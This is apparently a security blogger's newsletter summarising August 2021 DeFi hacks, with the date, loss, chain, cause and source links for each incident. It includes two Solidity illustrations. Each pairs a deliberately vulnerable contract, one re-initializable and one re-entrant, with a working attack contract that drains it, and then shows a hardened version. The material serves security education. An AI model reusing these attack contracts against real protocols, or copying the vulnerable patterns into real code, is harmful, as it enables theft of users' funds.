Monthly DeFi Blood Bath Report #4

Welcome to another edition of the Blood Bath report. This month was the craziest one in DeFi history thanks to two events: the Poly Network hack and samczsun's whitehack of SushiSwap.

This month we saw some big hacks even excluding Poly Network. Just as important, we also saw some major whitehacks that saved a lot of funds in well-known protocols 💪

Last month's report was dominated by attacks on bridges. That is no longer the case this month, as a new contender has entered the Blood Bath report: NFTs.

Enough talk. Let's dive in. Below you will find a summary of all the hacks that happened this month. All info was compiled from openblocksec, rekt.news, Peckshield, and Blocksecteam.

Popsicle Finance

When? Aug-03-2021
How much? $20.7M
Where? ETH
Why? Reward calculation error
Link: https://blocksecteam.medium.com/the-analysis-of-the-popsicle-finance-security-incident-9d9d5a3045c1

Wault Finance

When? Aug-04-2021
How much? $816K
Where? BSC
Why? Issue with $WUSD pegging mechanism
Link: https://waultfinance.medium.com/wusd-incident-recap-and-solution-1751a042e170

Casper DeFi

When? Aug-04-2021
How much? $172K
Where? BSC
Why? Malicious insider added a backdoor to mint tokens
Link: https://casperdefi.medium.com/casper-defi-post-mortem-after-casper-token-hack-fe668f6722b9

Zerogoki

When? Aug-08-2021
How much? $670K
Where? ETH
Why? Price Oracle manipulation
Link: https://blocksecteam.medium.com/the-analysis-of-the-zerogoki-attack-da4e0807b1840

Poly Network

When? Aug-10-2021
How much? $611M (most of it was later returned)
Where? ETH, BSC, Polygon, Ontology
Why? Cross-chain message validation error: a crafted cross-chain call let the attacker replace the keeper set (the signers the bridge trusts) and then authorize withdrawals
Link: https://mudit.blog/poly-network-largest-crypto-hack/, https://www.rekt.news/polynetwork-rekt/, https://peckshield.medium.com/polynetwork-bug-review-and-patch-analysis-88bde8441297

Punk Protocol

When? Aug-10-2021
How much? $8.95M
Where? ETH
Why? Unprotected initialize() let the attacker re-initialize the contract
Link: https://www.rekt.news/punkprotocol-rekt/
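How a re-initializable contract goes wrong, as an added illustration for this report (not Punk Protocol's code). VulnerableVault, Reinitializer and HardenedVault are all constructed for this example; the shape is a proxy's logic contract whose initialize() stands in for the constructor but has no one-shot guard, so whoever calls it last owns the contract:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed example for this report. VulnerableVault stands in for any logic
// contract deployed behind a proxy whose initialize() was meant to run once.
contract VulnerableVault {
    address public admin;
    mapping(address => uint256) public balances;

    // Replaces the constructor (constructors do not run in proxy storage).
    // Nothing stops a second call, and nothing restricts who makes the first one.
    function initialize(address _admin) external {
        admin = _admin;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Privileged: drains the vault. "admin" is whoever last called initialize().
    function sweep(address payable to) external {
        require(msg.sender == admin, "not admin");
        to.transfer(address(this).balance);
    }
}

// The attack is two calls and needs no exploit contract:
//   vault.initialize(attacker);   // overwrite admin
//   vault.sweep(attacker);        // drain everything
// This contract only packages both into a single transaction.
contract Reinitializer {
    function take(VulnerableVault vault) external {
        vault.initialize(address(this));      // now this contract is admin
        vault.sweep(payable(msg.sender));     // msg.sender == admin inside sweep()
    }
}

// Hardened: one-shot guard, zero-address check, and the implementation itself
// is locked in its constructor so it can never be initialized directly
// (the proxy's storage is separate, so the proxy's own flag still starts false).
contract HardenedVault {
    address public admin;
    bool private initialized;
    mapping(address => uint256) public balances;

    constructor() {
        initialized = true;
    }

    function initialize(address _admin) external {
        require(!initialized, "already initialized");
        require(_admin != address(0), "admin is zero");
        initialized = true;
        admin = _admin;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function sweep(address payable to) external {
        require(msg.sender == admin, "not admin");
        to.transfer(address(this).balance);
    }
}
```

Even with the guard, call initialize() in the same transaction that deploys the proxy: an initializer left for a later transaction can be front-run, and the one-shot guard then locks in the attacker's admin instead of yours. A quick audit check is to read the `initialized` flag (or `admin`) on every deployed proxy and confirm none is still at its zero value.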

Neko Network

When? Aug-11-2021
How much? $4M
Where? ETH
Why? Logic error in a lending protocol
Link: https://blog.mazeprotocol.com/neko-hacking-incident-report-e46cdf179fd9

CryptoVenetians NFT

When? Aug-11-2021
How much? $5M
Where? ETH
Why? Stolen Private Keys
Link: https://docs.google.com/document/d/1ebAPc0-gZsJAhxUZpoDFZEZCBhaCWzLshAVxmzcwnw0/edit#heading=h.bqti7y3gd1km

DAO Maker

When? Aug-12-2021
How much? $7M
Where? ETH
Why? Stolen Private Keys
Link: https://blocksecteam.medium.com/the-analysis-of-the-daomaker-attack-32365c37e7fc

Ref Finance

When? Aug-14-2021
How much? $3.2M
Where? NEAR
Why? Logic error
Link: https://twitter.com/finance_ref/status/1426649258812448774

Curve Bribe / Whitehack

When? Aug-14-2021
How much? $117K
Where? ETH
Why? Whitehack
Link: https://twitter.com/bantg/status/1426629982328180737

SushiSwap / Whitehack

When? Aug-17-2021
How much? $350M at risk
Where? ETH
Why? Whitehack: samczsun found that the MISO Dutch auction reused msg.value across batched calls, so one payment could be counted many times
Link: https://www.paradigm.xyz/2021/08/two-rights-might-make-a-wrong/

xSurge

When? Aug-17-2021
How much? $4M
Where? BSC
Why? Re-entrancy
Link: https://twitter.com/BlockSecTeam/status/1427482803134894080
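Re-entrancy through a callback during a token transfer, as an added illustration for this report (not xSurge's or CREAM's code). HookToken, VulnerableLender, HardenedLender and Attacker are all constructed for this example; HookToken is a stand-in for an ERC-777-style token that calls the recipient on every transfer, which is what let the CREAM Finance attacker later this month re-enter the borrow path through the AMP token. The fix is the same whatever the callback is (a token hook or a native-coin transfer in a sell function): update state before the external call, and reject nested calls.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed for this report. A token that notifies contract recipients on transfer.
interface IReceiveHook {
    function onTokenReceived(address from, uint256 amount) external;
}

contract HookToken {
    mapping(address => uint256) public balanceOf;

    constructor(uint256 supply) {
        balanceOf[msg.sender] = supply;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount;   // reverts on underflow in 0.8
        balanceOf[to] += amount;
        // The callback: control passes to the recipient before transfer() returns.
        if (to.code.length > 0) {
            IReceiveHook(to).onTokenReceived(msg.sender, amount);
        }
        return true;
    }
}

// Vulnerable: the interaction (transfer, which calls out) happens before the
// effect (debt recorded), so the collateral check is run against stale debt.
contract VulnerableLender {
    HookToken public token;
    mapping(address => uint256) public collateral;   // native coin posted
    mapping(address => uint256) public debt;

    constructor(HookToken t) { token = t; }

    function depositCollateral() external payable {
        collateral[msg.sender] += msg.value;
    }

    // Borrow up to collateral, 1:1 for simplicity.
    function borrow(uint256 amount) external {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralized");
        token.transfer(msg.sender, amount);   // hook fires here, debt still unchanged
        debt[msg.sender] += amount;
    }
}

// Hardened: checks, then effects, then interactions, plus a re-entrancy lock
// so a hook that calls back into borrow() reverts the whole transaction.
contract HardenedLender {
    HookToken public token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant");
        locked = true;
        _;
        locked = false;
    }

    constructor(HookToken t) { token = t; }

    function depositCollateral() external payable {
        collateral[msg.sender] += msg.value;
    }

    function borrow(uint256 amount) external nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralized");
        debt[msg.sender] += amount;           // effect first
        token.transfer(msg.sender, amount);   // interaction last
    }
}

// Attacker: posts collateral once, then re-enters borrow() from the token hook
// until the lender's token balance is drained. Every nested call sees debt == 0.
contract Attacker is IReceiveHook {
    VulnerableLender public lender;
    HookToken public token;

    constructor(VulnerableLender l, HookToken t) { lender = l; token = t; }

    function attack() external payable {
        lender.depositCollateral{value: msg.value}();
        lender.borrow(msg.value);   // the first, legitimate-looking borrow
    }

    function onTokenReceived(address, uint256 amount) external override {
        if (msg.sender == address(token) && token.balanceOf(address(lender)) >= amount) {
            lender.borrow(amount);  // re-enter while the debt is still unrecorded
        }
    }
}
```

Against HardenedLender the same Attacker fails twice over: the debt is already recorded when the hook runs, so the collateral check in the nested call fails, and even if it passed, the lock would revert it. Both guards are worth having, because the lock also covers paths where the accounting is split across several functions.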

Pinecone Finance

When? Aug-18-2021
How much? $17.5K
Where? BSC
Why? Insufficient validation
Link: https://twitter.com/peckshield/status/1428233500260511746

Solend

When? Aug-19-2021
How much? $16K
Where? Solana
Why? Missing authorization check on an admin instruction
Link: https://docs.google.com/document/d/1-WoQwT1QrPEX-r4N-fDamRQ50LM8DsdsOyq1iTabS3Q/edit#

X-Token

When? Aug-30-2021
How much? $4.5M
Where? ETH
Why? Price manipulation funded by a flash loan
Link: https://rekt.news/xtoken-rekt-x2/

CREAM Finance

When? Aug-30-2021
How much? $18.8M
Where? ETH
Why? Flash-loan-funded re-entrancy through the AMP token's ERC-777-style transfer hook
Link: https://rekt.news/cream-rekt/

In hacks alone, excluding Poly Network, we saw ~$77.84M drained from DeFi protocols across different chains. We saw the first DeFi hack on Solana (Solend). With NFTs exploding again, hackers are eyeing that market and probing its protocols.

We also had two whitehacks that saved a substantial amount of money.

In the next reports, I will also take information from Immunefi to learn how much bug bounties helped save each month.

Stay safe out there, and remember that we're still early in blockchain, and it will take time until the number of hacks and their impact go down.


Thanks for reading, and if you like my writing, you can subscribe to my blog to receive the newsletter. Subscription box below 👇

If the newsletter is not your thing, check out my Twitter @adrianhetman, where I post and share exciting news from the Blockchain world and security.